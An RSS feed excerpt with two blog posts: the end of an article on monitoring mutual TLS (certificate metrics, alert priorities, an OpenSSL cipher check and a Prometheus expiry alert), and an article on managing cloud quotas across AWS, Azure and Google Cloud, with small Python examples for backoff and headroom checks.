&lt;strong&gt;Alert threshold&lt;/strong&gt;: Immediate alert (red - highest priority)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Indicates potential security breach or misconfiguration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Action required&lt;/strong&gt;: Investigate immediately - could be an active attack&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Unknown service attempting to connect to Payment Service - no valid certificate"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M8: Certificate Revocations&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Certificates that have been revoked before expiration&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Number and reason for revocations&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Indicates security incidents or compromised services&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Common reasons&lt;/strong&gt;: Key compromise, service decommissioned, security policy violation&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "Cart Service certificate revoked due to suspected key exposure"&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;M9: Cipher Suite Usage&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Which encryption algorithms are being used&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;What to monitor&lt;/strong&gt;: Distribution of cipher suites across connections&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Why it matters&lt;/strong&gt;: Weak ciphers indicate security vulnerabilities&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Best practice&lt;/strong&gt;: Only allow TLS 1.3 with modern cipher suites&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Red flags&lt;/strong&gt;: TLS 1.0/1.1, weak ciphers like RC4 or 3DES&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example&lt;/strong&gt;: "10% of connections using deprecated TLS 1.2 - update client configurations"&lt;/li&gt;
&lt;/ul&gt;
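
&lt;p&gt;You can list which TLS 1.3 suites your local OpenSSL build (1.1.1+) would offer; this is a quick sanity check of your own configuration, not a substitute for monitoring what peers actually negotiate:&lt;/p&gt;

```shell
# TLS 1.3 cipher suites supported by the local OpenSSL build;
# the modern AEAD suites (TLS_AES_*, TLS_CHACHA20_*) should appear,
# while RC4 and 3DES should not
openssl ciphers -s -tls1_3
```

&lt;p&gt;The same command with &lt;code&gt;-tls1&lt;/code&gt; or &lt;code&gt;-tls1_1&lt;/code&gt; helps confirm that legacy protocols are disabled in your build's default configuration.&lt;/p&gt;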

&lt;p&gt;&lt;strong&gt;Setting Up Alerts - Priority Levels:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;IMMEDIATE (Red):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Unauthorized access attempts (M7)&lt;/li&gt;
&lt;li&gt;Security incidents requiring immediate response&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Response time&lt;/strong&gt;: Within minutes&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example action&lt;/strong&gt;: Page security team, potentially block traffic&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;HIGH (Orange):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Certificate expiring in &amp;lt;7 days (M1)&lt;/li&gt;
&lt;li&gt;Failed validations increasing (M2)&lt;/li&gt;
&lt;li&gt;Connection failure spike (M5)&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Response time&lt;/strong&gt;: Within hours&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example action&lt;/strong&gt;: Investigate root cause, trigger manual rotation if needed&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;MEDIUM (Yellow):&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Rotation success rate dropping&lt;/li&gt;
&lt;li&gt;Handshake duration increasing&lt;/li&gt;
&lt;li&gt;Certificate errors appearing&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Response time&lt;/strong&gt;: Within business day&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Example action&lt;/strong&gt;: Review logs, identify configuration issues&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Monitoring Tools:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Prometheus + Grafana&lt;/strong&gt;: Popular open-source stack&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Datadog / New Relic&lt;/strong&gt;: Commercial APM solutions&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Cloud-native&lt;/strong&gt;: CloudWatch (AWS), Cloud Monitoring (GCP), Azure Monitor&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Service mesh built-in&lt;/strong&gt;: Istio, Linkerd provide metrics out-of-box&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Dashboard Example:&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;A good mTLS dashboard shows:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Certificate expiration timeline (all certs visualized)&lt;/li&gt;
&lt;li&gt;Connection success rate (should be &amp;gt;99.9%)&lt;/li&gt;
&lt;li&gt;Handshake latency over time&lt;/li&gt;
&lt;li&gt;Alert history and current active alerts&lt;/li&gt;
&lt;li&gt;Per-service breakdown of all metrics&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;By monitoring these metrics, you can catch problems before they cause outages and detect security incidents in real-time.&lt;/p&gt;
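
&lt;p&gt;With Prometheus + Grafana (listed above), M1 becomes a standing alert rule. The metric name below is the one exposed by cert-manager; treat it as an assumption to verify against whatever exporter your stack actually uses:&lt;/p&gt;

```yaml
groups:
  - name: mtls-certificates
    rules:
      - alert: CertificateExpiringSoon
        # certmanager_certificate_expiration_timestamp_seconds is
        # cert-manager's metric; substitute your exporter's name.
        # 604800 s = 7 days.
        expr: min(certmanager_certificate_expiration_timestamp_seconds - time()) &lt; 604800
        for: 1h
        labels:
          severity: high   # maps to the HIGH (orange) tier above
        annotations:
          summary: "A certificate expires in under 7 days - rotation may be failing"
```

&lt;p&gt;Analogous rules over handshake-latency histograms and connection-failure counters cover M4 and M5 with the same pattern.&lt;/p&gt;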

&lt;h3&gt;
  
  
  Common Issues and Solutions
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: Certificate expired&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Solution&lt;/strong&gt;: Implement automated rotation, alerting at a fraction of the certificate lifetime (e.g., 30 days out for year-long certificates, a few hours out for 24-hour certificates)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: Certificate chain validation fails&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Solution&lt;/strong&gt;: Ensure CA certificate is properly distributed to all services&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;Issue&lt;/strong&gt;: Performance degradation&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Solution&lt;/strong&gt;: Use session resumption, optimize cipher suites, consider hardware acceleration&lt;/li&gt;
&lt;/ul&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;Mutual TLS is no longer optional in modern cloud environments. It provides strong authentication, encryption, and forms the foundation of zero-trust architectures. While it adds complexity, cloud-native tools like service meshes and managed certificate authorities make implementation practical and manageable.&lt;/p&gt;

&lt;p&gt;Start small: implement mTLS for your most sensitive service-to-service communications first, then gradually expand coverage as your team gains experience. The security benefits far outweigh the initial investment in setup and learning.&lt;/p&gt;

&lt;h2&gt;
  
  
  Additional Resources
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;&lt;a href="https://istio.io/latest/docs/concepts/security/" rel="noopener noreferrer"&gt;Istio mTLS Documentation&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://docs.aws.amazon.com/app-mesh/latest/userguide/mutual-tls.html" rel="noopener noreferrer"&gt;AWS App Mesh mTLS Guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cloud.google.com/service-mesh/docs/security/security-overview" rel="noopener noreferrer"&gt;Google Cloud Service Mesh Security&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://cert-manager.io/" rel="noopener noreferrer"&gt;cert-manager for Kubernetes&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://csrc.nist.gov/publications/detail/sp/800-52/rev-2/final" rel="noopener noreferrer"&gt;NIST Guidelines on TLS&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Ready to implement mTLS in your cloud environment? Start by evaluating your current service-to-service communication patterns and identifying high-value targets for mTLS implementation.&lt;/em&gt;&lt;/p&gt;




&lt;p&gt;Originally published at - &lt;a href="https://platformwale.blog/" rel="noopener noreferrer"&gt;https://platformwale.blog/&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>kubernetes</category>
      <category>cloud</category>
      <category>distributedsystems</category>
    </item>
    <item>
      <title>Navigating the Hidden Minefield: Cloud Quotas and Infrastructure Deployment Delays</title>
      <dc:creator>Piyush Jajoo</dc:creator>
      <pubDate>Sun, 01 Feb 2026 15:27:58 +0000</pubDate>
      <link>https://dev.to/piyushjajoo/navigating-the-hidden-minefield-cloud-quotas-and-infrastructure-deployment-delays-54hm</link>
      <guid>https://dev.to/piyushjajoo/navigating-the-hidden-minefield-cloud-quotas-and-infrastructure-deployment-delays-54hm</guid>
      <description>&lt;p&gt;Every cloud engineer has been there. Your infrastructure-as-code is perfect, your deployment pipeline is green, stakeholders are waiting, and then you hit the wall: "Quota exceeded for resource 'CPUS' in region 'us-east-1'." What should have been a 20-minute deployment turns into days of delays, escalations, and frantic quota requests. In multi-cloud environments, this problem multiplies exponentially.&lt;/p&gt;

&lt;h2&gt;
  
  
  The Real Cost of Quota Surprises
&lt;/h2&gt;

&lt;p&gt;Quota limits are cloud providers' way of preventing runaway costs and abuse and of ensuring fair resource distribution. But when you're unprepared, they become deployment blockers that cascade through your entire delivery timeline. A quota issue isn't just a technical hiccup—it's a business risk that can derail product launches, delay critical features, and erode stakeholder confidence.&lt;/p&gt;

&lt;p&gt;In single-cloud environments, this is manageable. In multi-cloud environments where you're orchestrating resources across AWS, Azure, and Google Cloud simultaneously, quota issues become a coordination nightmare. Each provider has different quota structures, request processes, and approval timelines.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Quota Issues Are Particularly Painful in Multi-Cloud
&lt;/h2&gt;

&lt;p&gt;Multi-cloud strategies introduce several quota-related complications that single-cloud deployments don't face:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Different quota models across providers.&lt;/strong&gt; AWS uses service quotas with soft and hard limits. Azure implements subscription-level quotas with regional variations. Google Cloud has project-level and per-region quotas. Each provider also meters resources differently—what counts as one vCPU against an AWS quota may map onto Azure's quota units differently.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Inconsistent approval timelines.&lt;/strong&gt; AWS Service Quotas can sometimes be auto-approved for certain increases, taking minutes. Azure quota increases might require 24-48 hours. Google Cloud quota requests can take several business days depending on the resource type. When your deployment spans all three clouds, you're only as fast as the slowest approval.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Lack of unified visibility.&lt;/strong&gt; There's no single pane of glass showing your quota utilization across clouds. You need separate monitoring for AWS Service Quotas, Azure subscription limits, and Google Cloud quotas. This fragmentation makes it nearly impossible to get a holistic view of your capacity headroom.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Regional fragmentation.&lt;/strong&gt; Each cloud region has independent quotas. Your multi-cloud disaster recovery strategy might require deploying across six regions in each of three providers—that's 18+ different quota contexts to manage.&lt;/p&gt;

&lt;h2&gt;
  
  
  Common Quota Bottlenecks That Derail Deployments
&lt;/h2&gt;

&lt;p&gt;Based on real-world experience, here are the quotas most likely to cause deployment delays:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Compute resources&lt;/strong&gt; are the number one culprit. Standard vCPU quotas, spot instance limits, and GPU quotas frequently block deployments. A Kubernetes cluster expansion that needs 200 additional vCPUs can grind to a halt if you only have 50 vCPUs of quota headroom.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Networking quotas&lt;/strong&gt; are often overlooked until it's too late. VPCs, subnets, elastic IPs, load balancers, NAT gateways, and VPN connections all have limits. In AWS, the default limit of 5 VPCs per region seems generous until you're implementing a hub-and-spoke network architecture.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Storage and database limits&lt;/strong&gt; create bottlenecks for data-intensive applications. Provisioned IOPS limits, maximum volume sizes, snapshot quotas, and database instance counts can block deployments. Azure's limit on the number of storage accounts per subscription has caught many teams off guard.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;API rate limits&lt;/strong&gt; don't prevent deployment but slow it down significantly. When deploying hundreds of resources simultaneously, hitting API throttling limits can turn a 30-minute deployment into a 3-hour ordeal.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Specialized resources&lt;/strong&gt; like dedicated hosts, reserved capacity, or specific instance families often have very low default quotas. If your workload requires GPU instances or high-memory instances, default quotas are rarely sufficient.&lt;/p&gt;
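&lt;p&gt;For the API throttling case specifically, the standard mitigation is exponential backoff with jitter around every bulk call. A minimal sketch, assuming a generic &lt;code&gt;ThrottledError&lt;/code&gt; stand-in for whatever throttling exception your SDK raises (boto3, for example, surfaces throttling as a &lt;code&gt;ClientError&lt;/code&gt; with a throttling error code):&lt;/p&gt;

```python
import random
import time

class ThrottledError(Exception):
    """Stand-in for a provider throttling error, e.g. boto3's ClientError
    carrying an error code like 'Throttling' or 'RequestLimitExceeded'."""

def with_backoff(call, max_attempts=5, base_delay=1.0, cap=30.0):
    """Retry a throttled call with exponential backoff and full jitter."""
    for attempt in range(max_attempts):
        try:
            return call()
        except ThrottledError:
            if attempt == max_attempts - 1:
                raise
            # Sleep a random amount up to min(cap, base * 2^attempt) seconds.
            time.sleep(random.uniform(0, min(cap, base_delay * 2 ** attempt)))
```

&lt;p&gt;Full jitter spreads retries out so that hundreds of simultaneous resource creations don't re-collide on the same throttling window.&lt;/p&gt;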

&lt;h2&gt;
  
  
  The Quota Request Process: Why Planning Matters
&lt;/h2&gt;

&lt;p&gt;Understanding the typical quota increase workflow reveals why preparation is critical. Most quota requests follow this pattern: identify the bottleneck (often during a failed deployment), determine the required quota, submit a request through the provider's support system, wait for human review and approval, and finally retry the deployment. This process typically takes 2-5 business days minimum.&lt;/p&gt;

&lt;p&gt;For critical or large quota increases, providers may require business justification, architecture reviews, or proof of legitimate use cases. Some increases require escalation to account managers. In multi-cloud scenarios, you're running this process in parallel across multiple providers, each with its own bureaucracy.&lt;/p&gt;

&lt;p&gt;The worst-case scenario happens during critical incidents or time-sensitive launches. When your production environment needs emergency scaling, quota limits don't care about your urgency. By then, it's too late.&lt;/p&gt;

&lt;h2&gt;
  
  
  Building a Proactive Quota Management Strategy
&lt;/h2&gt;

&lt;p&gt;The solution is shifting from reactive firefighting to proactive capacity planning. Successful multi-cloud teams implement these practices:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Maintain a quota inventory.&lt;/strong&gt; Create a centralized spreadsheet or database tracking current quotas, current utilization, and headroom for every critical resource type across all regions and providers. Update this monthly at minimum. Include the last increase date and approval contact for each quota.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Forecast based on deployment patterns.&lt;/strong&gt; Analyze your infrastructure-as-code repositories to understand typical deployment sizes. If your Kubernetes clusters always scale to 50 nodes, ensure you have quota for 75+ nodes to provide buffer. Map your application architecture to required quotas—a typical microservices deployment might need X vCPUs, Y load balancers, and Z database instances.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Request quotas before you need them.&lt;/strong&gt; When planning a new project or feature, audit the quota requirements during the design phase. Submit quota increase requests at the beginning of the sprint, not the end. Build a 2-week buffer for quota approvals into your project timelines.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Implement automated quota monitoring.&lt;/strong&gt; Use cloud provider APIs to programmatically check quota utilization. Set up alerts when utilization exceeds 70% of any critical quota. Tools like AWS Trusted Advisor, Azure Advisor, and Google Cloud Recommender provide some of this functionality, but custom automation gives you multi-cloud visibility.&lt;/p&gt;
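&lt;p&gt;The alerting core of such a monitor is provider-agnostic. The sketch below assumes you have already pulled &lt;code&gt;(name, used, limit)&lt;/code&gt; tuples from each provider's API (for AWS, the &lt;code&gt;servicequotas&lt;/code&gt; client in boto3 exposes limits); the quota names here are made up for illustration:&lt;/p&gt;

```python
def over_threshold(quotas, threshold=0.70):
    """Return (name, utilization) for quotas at or above the alert threshold.

    quotas: iterable of (name, used, limit) tuples aggregated from the
    per-provider APIs. Quotas with a zero limit are skipped.
    """
    alerts = []
    for name, used, limit in quotas:
        if limit > 0 and used / limit >= threshold:
            alerts.append((name, round(used / limit, 2)))
    return alerts
```

&lt;p&gt;A daily cron that feeds this from all three providers and posts the result to your team channel is often enough to catch the 70% crossings before they become deployment failures.&lt;/p&gt;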

&lt;p&gt;&lt;strong&gt;Establish quota request templates.&lt;/strong&gt; Standardize your quota increase requests with clear business justifications, expected usage patterns, and rollout timelines. Having pre-approved templates for common scenarios speeds up future requests. Build relationships with your technical account managers or cloud support contacts before you need emergency help.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Design with quotas in mind.&lt;/strong&gt; Your architecture should consider quota constraints. Instead of deploying everything to us-east-1, distribute workloads across regions. Use resource tagging to track which resources belong to which projects, making it easier to forecast quota needs. Implement gradual rollouts that won't hit quotas all at once.&lt;/p&gt;

&lt;h2&gt;
  
  
  Practical Example: Deploying a Multi-Region Application
&lt;/h2&gt;

&lt;p&gt;Consider deploying a containerized application across AWS and Google Cloud with active-active configuration. Here's what proactive quota management looks like:&lt;/p&gt;

&lt;p&gt;During the planning phase, you identify requirements: 3 Kubernetes clusters (2 in AWS, 1 in GCP), 120 total vCPUs, 6 load balancers, 3 NAT gateways, 15 persistent volumes, and 3 managed databases. You map this to specific quotas: AWS EC2 vCPU limits in us-east-1 and eu-west-1, AWS VPC limits, AWS RDS instance quotas, GCP compute instance quotas in us-central1, GCP load balancer forwarding rules, and GCP persistent disk quotas.&lt;/p&gt;

&lt;p&gt;Two weeks before deployment, you audit current quotas and utilization. You discover that AWS us-east-1 has only 80 vCPUs of headroom—insufficient. AWS eu-west-1 is fine. GCP us-central1 has adequate quota. You immediately submit a request for 200 additional vCPUs in AWS us-east-1 with business justification explaining the production deployment timeline.&lt;/p&gt;

&lt;p&gt;One week before deployment, you verify that AWS approved the quota increase. All quotas now have at least 25% headroom above requirements. On deployment day, everything succeeds without quota-related failures. The rollout completes in 45 minutes instead of being blocked for days.&lt;/p&gt;

&lt;h2&gt;
  
  
  Multi-Cloud Quota Monitoring Tools and Approaches
&lt;/h2&gt;

&lt;p&gt;While no perfect solution exists for unified multi-cloud quota management, several approaches can help. Cloud provider native tools like the AWS Service Quotas console, the Azure subscription usage and quotas blade, and the Quotas page in the Google Cloud console provide per-provider visibility. Custom scripting with provider APIs can aggregate quota data into a central dashboard—AWS boto3, Azure SDK, and Google Cloud Client Libraries all expose quota information programmatically.&lt;/p&gt;

&lt;p&gt;Third-party cloud management platforms like CloudHealth, Flexera, or Spot.io offer some multi-cloud quota visibility as part of broader cost management features. Infrastructure-as-code tools can be extended—Terraform, Pulumi, or CloudFormation can validate quota availability before deployment attempts. Some teams build pre-deployment validation scripts that check quota headroom before running &lt;code&gt;terraform apply&lt;/code&gt;.&lt;/p&gt;
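&lt;p&gt;The core of such a pre-deployment gate is a simple comparison of what the plan will consume against current headroom. A hedged sketch—the quota keys and numbers are illustrative, and wiring it to real provider APIs and your plan output is the part that varies per team:&lt;/p&gt;

```python
def validate_headroom(required, available):
    """Compare a plan's resource demands against current quota headroom.

    required: dict mapping a quota key to units the deployment will consume.
    available: dict mapping a quota key to remaining headroom (limit - usage).
    Returns the list of (key, needed, headroom) tuples that would block it.
    """
    blockers = []
    for key, needed in required.items():
        headroom = available.get(key, 0)
        if needed > headroom:
            blockers.append((key, needed, headroom))
    return blockers
```

&lt;p&gt;Run in CI before the apply step, a non-empty result fails the pipeline with an actionable message instead of a mid-deployment quota error.&lt;/p&gt;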

&lt;p&gt;Implementing a lightweight quota dashboard that polls each cloud provider daily and tracks utilization trends is often the most practical approach for mid-sized teams.&lt;/p&gt;

&lt;h2&gt;
  
  
  Making Quota Management Part of Your Culture
&lt;/h2&gt;

&lt;p&gt;Beyond tools and processes, successful quota management requires cultural change. Treat quota planning as seriously as capacity planning—it's part of ensuring reliability and availability. Make quota reviews a standard checkpoint in architecture reviews and deployment runbooks. Include quota requirements in infrastructure documentation and runbook templates.&lt;/p&gt;

&lt;p&gt;Train your teams to understand quota concepts and encourage them to think about quotas during design, not during deployment. Create postmortems for quota-related incidents and use them as learning opportunities. Celebrate when proactive quota management prevents a potential outage or delay.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion: Quotas as Capacity Planning, Not Roadblocks
&lt;/h2&gt;

&lt;p&gt;Cloud quotas aren't arbitrary restrictions—they're capacity management tools that, when handled proactively, become invisible. In single-cloud environments, quota management is straightforward. In multi-cloud environments, it requires deliberate strategy, automated monitoring, and organizational discipline.&lt;/p&gt;

&lt;p&gt;The teams that succeed in multi-cloud deployments are those who treat quotas as first-class concerns in their infrastructure planning. They forecast needs, request headroom in advance, monitor continuously, and build quota awareness into their deployment culture. The alternative is accepting that every major deployment carries the risk of multi-day delays due to something entirely preventable.&lt;/p&gt;

&lt;p&gt;Start today by auditing your current quotas across all providers. Identify which resources are running close to limits. Submit proactive increase requests for anything above 70% utilization. Build monitoring for critical quotas. The next time you need to deploy infrastructure at scale, you'll be grateful you did.&lt;/p&gt;

&lt;p&gt;Your infrastructure code might be perfect, but if you don't have the quota to run it, it might as well be broken. In multi-cloud environments, quota management isn't optional—it's the difference between smooth deployments and costly delays.&lt;/p&gt;




&lt;p&gt;Originally published at - &lt;a href="https://platformwale.blog/" rel="noopener noreferrer"&gt;https://platformwale.blog/&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cloud</category>
      <category>devops</category>
      <category>kubernetes</category>
      <category>aws</category>
    </item>
  </channel>
</rss>
